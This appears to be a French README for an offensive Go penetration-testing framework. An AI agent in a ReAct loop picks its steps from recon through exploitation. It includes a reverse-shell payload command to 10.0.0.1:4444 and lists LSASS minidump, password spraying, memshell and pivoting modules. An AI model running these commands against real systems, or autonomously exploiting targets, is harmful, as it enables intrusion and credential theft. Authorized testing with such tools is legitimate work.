
Framework de test d'intrusion avec moteur de décision piloté par l'IA
Framework de test de pénétration natif Windows écrit en Go. Architecture modulaire avec moteur de décision piloté par IA (API compatible OpenAI).
go build -ldflags="-X main.version=$(git describe --tags)" -o FUCKER.exe ./cmd/fucker/
Compilation croisée :
GOOS=linux GOARCH=amd64 go build -o FUCKER_linux_amd64 ./cmd/fucker/
GOOS=windows GOARCH=amd64 go build -o FUCKER_win_amd64.exe ./cmd/fucker/
GOOS=windows GOARCH=386 go build -o FUCKER_win_386.exe ./cmd/fucker/
FUCKER.exe -t example.com -portscan -fingerprint -vulnscan -report
FUCKER.exe -t example.com -subdomain -dirbuster
FUCKER.exe -socks 1080
FUCKER.exe -forward 3389:192.168.1.100:3389
FUCKER.exe -payload "revshell|10.0.0.1|4444"
Copiez .env.example vers .env :
Sans configuration IA, l'outil fonctionne en mode CLI manuel (toutes les options fonctionnent normalement).
Lorsque OPENAI_API_KEY est définie, l'outil exécute une boucle ReAct : l'agent IA décide quels outils appeler en fonction des résultats précédents. Le prompt système définit un workflow de pentest : reconnaissance -> empreinte -> scan de vulnérabilités -> exploitation -> rapport.
Sans IA, toutes les fonctionnalités sont disponibles via les options CLI.
| Option | Description |
|---|
-t | Domaine/IP/URL cible |
-p | Ports (virgule ou plage, défaut : 80,443,22,21,3389,3306,6379,27017) |
-subdomain | Énumération de sous-domaines |
-portscan | Scan de ports TCP |
-fingerprint | Empreinte de services |
-dirbuster | Force brute de répertoires |
-vulnscan | Scan de vulnérabilités basé sur des POC |
-logic | Vérifications des vulnérabilités logiques |
-spray | Pulvérisation de mots de passe |
-exploit | Modules d'exploitation |
-report | Générer un rapport HTML + JSON |
-o | Fichier de sortie (défaut : report.html) |
-socks | Démarrer un proxy SOCKS5 sur le port |
-httpproxy | Démarrer un proxy HTTP sur le port |
-forward | Redirection de port (local:host:remote) |
-payload | Générer un payload (revshell|IP|PORT) |
-v | Mode verbeux |
-debug | Sortie de débogage |
-workers | Workers simultanés (défaut : 20) |
-timeout | Délai d'expiration des requêtes en secondes (défaut : 30) |
-proxy | URL du proxy |
-audit | Chemin du journal d'audit (défaut : audit.json) |
| Variable | Description |
|---|
OPENAI_BASE_URL | URL de base de l'API compatible OpenAI |
OPENAI_API_KEY | Clé API |
OPENAI_MODEL_NAME | Modèle (défaut : gpt-4) |
PROXY | URL du proxy |
MAX_WORKERS | Nombre maximal de workers (défaut : 20) |
REQUEST_TIMEOUT | Délai d'expiration en secondes (défaut : 30) |
RETRY_COUNT | Nouvelles tentatives (défaut : 3) |
| Package | Description |
|---|
cmd/fucker/ | Point d'entrée, analyse CLI, orchestration des modules |
internal/ai/ | Client OpenAI, boucle d'agent ReAct, système d'outils |
internal/scanner/ | Scan de ports, sous-domaines, empreinte, dirbuster |
internal/vuln/ | Moteur de POC YAML, 16 POC intégrés, vérificateurs logiques |
internal/exploit/ | Générateur de reverse shell, proxy SOCKS5/HTTP, memshell |
internal/lateral/ | Pulvérisation de mots de passe, minidump LSASS, proxy SMB/RDP |
internal/report/ | Rapport basé sur un modèle HTML, export JSON, évaluation des risques |
internal/logger/ | Journalisation hiérarchisée, piste audit.json |
internal/plugin/ | Chargeur de plugins Python/Go |
internal/config/ | Chargeur .env |
internal/common/ | Types partagés |